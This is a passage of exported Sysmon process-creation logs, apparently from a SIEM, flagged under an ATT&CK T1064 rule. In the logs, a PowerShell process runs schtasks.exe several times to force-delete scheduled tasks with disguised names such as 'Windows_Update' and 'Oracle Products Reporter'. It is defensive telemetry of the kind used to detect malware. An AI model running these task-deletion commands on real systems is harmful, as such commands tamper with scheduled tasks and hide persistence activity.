C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.658"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001094e42600}"",""processId"":""4908"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update_windows /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.606",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.615 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001058e22600} +ProcessId: 1124 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Windows_Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.618171800Z"",""eventRecordID"":""3047"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.615\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001058e22600}\r\nProcessId: 1124\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.615"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001058e22600}"",""processId"":""1124"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Windows_Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.590",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.562 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001012e02600} +ProcessId: 5272 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Sorry /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.584731400Z"",""eventRecordID"":""3046"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.562\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001012e02600}\r\nProcessId: 5272\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.562"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001012e02600}"",""processId"":""5272"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Sorry /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.589",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.475 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001072dc2600} +ProcessId: 5196 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ngm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.480209700Z"",""eventRecordID"":""3045"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.475\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001072dc2600}\r\nProcessId: 5196\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.475"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001072dc2600}"",""processId"":""5196"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ngm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.551",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.393 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001025d92600} +ProcessId: 1688 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN gm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.397984400Z"",""eventRecordID"":""3044"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.393\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001025d92600}\r\nProcessId: 1688\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.393"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001025d92600}"",""processId"":""1688"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN gm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.535",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.345 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001076d72600} +ProcessId: 7784 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for products"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.357808900Z"",""eventRecordID"":""3043"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.345\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001076d72600}\r\nProcessId: 7784\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.345"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001076d72600}"",""processId"":""7784"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for products\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:28.481",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:00.279 +ProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001035d52600} +ProcessId: 6140 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Products Reporter"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:00.284013600Z"",""eventRecordID"":""3042"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:00.279\r\nProcessGuid: {df9fc3d3-b3b4-5ecf-0000-001035d52600}\r\nProcessId: 6140\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:00.279"",""processGuid"":""{df9fc3d3-b3b4-5ecf-0000-001035d52600}"",""processId"":""6140"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 